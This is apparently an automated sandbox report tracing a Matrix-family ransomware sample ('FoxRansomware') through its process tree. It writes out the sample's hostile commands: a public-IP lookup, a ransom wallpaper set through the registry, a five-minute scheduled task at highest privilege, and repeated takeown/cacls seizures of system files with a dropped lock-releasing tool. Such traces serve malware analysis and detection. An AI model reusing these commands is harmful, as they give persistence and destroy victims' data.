941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1112 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 1112 wrote to memory of 3496 1112 cmd.exe cacls.exe PID 1112 wrote to memory of 3496 1112 cmd.exe cacls.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWVcqERC.exe"2⤵PID:2824
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWVcqERC.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWVcqERC.exe" -n2⤵
- Executes dropped EXE
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\J9Tu7Q2X.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\hC6vpv1h.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\hC6vpv1h.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2860
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:5940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pT0zqRJb.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pT0zqRJb.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\XjGMi7Hl.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\XjGMi7Hl.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:5796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:5228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:5920 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5916 -
C:\Users\Admin\AppData\Local\Temp\FCcth9iY64.exeFCcth9iY.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:3496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "store.db" -nobanner3⤵PID:2864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""2⤵PID:5136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C3⤵PID:5264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"3⤵
- Modifies file permissions
PID:5600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "ActivitiesCache.db" -nobanner3⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "ActivitiesCache.db" -nobanner4⤵
- Executes dropped EXE
PID:5900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:5228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:5800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵PID:5728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "classes.jsa" -nobanner3⤵PID:4192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵PID:6020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "classes.jsa" -nobanner3⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5508 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "WuProvider.54de1be9-37bd-4b03-8e62-b8dcdc412ad8.1.etl" -nobanner5⤵
- Executes dropped EXE
PID:5320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:5656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:3504
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:5004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5388
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:6112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "watermark.png" -nobanner3⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:5632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:6024
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:5448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:4192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:4684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""2⤵PID:5504
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C3⤵PID:5488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftNotepad.xml" -nobanner3⤵PID:4084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftNotepad.xml" -nobanner4⤵
- Executes dropped EXE
PID:2216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""2⤵PID:5728
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C3⤵PID:1048
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner3⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner4⤵
- Executes dropped EXE
PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""2⤵PID:3828
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C3⤵PID:5236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "NetworkPrinters.xml" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "NetworkPrinters.xml" -nobanner4⤵
- Executes dropped EXE
PID:5972
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:1012
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:3740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6096
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:6120
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:4268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "device.png" -nobanner3⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "device.png" -nobanner4⤵
- Executes dropped EXE
PID:4356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:5196
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:5808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2564
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:3304
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:4848
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:5572
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:3760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "tasks.xml" -nobanner3⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "tasks.xml" -nobanner4⤵
- Executes dropped EXE
PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:2504
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵
- Executes dropped EXE
PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:5388
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:3864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:5892
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:1296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:5836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.54de1be9-37bd-4b03-8e62-b8dcdc412ad8.1.etl""2⤵PID:5480
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.54de1be9-37bd-4b03-8e62-b8dcdc412ad8.1.etl" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.54de1be9-37bd-4b03-8e62-b8dcdc412ad8.1.etl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "WuProvider.54de1be9-37bd-4b03-8e62-b8dcdc412ad8.1.etl" -nobanner3⤵PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:5808
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:6112
-
-
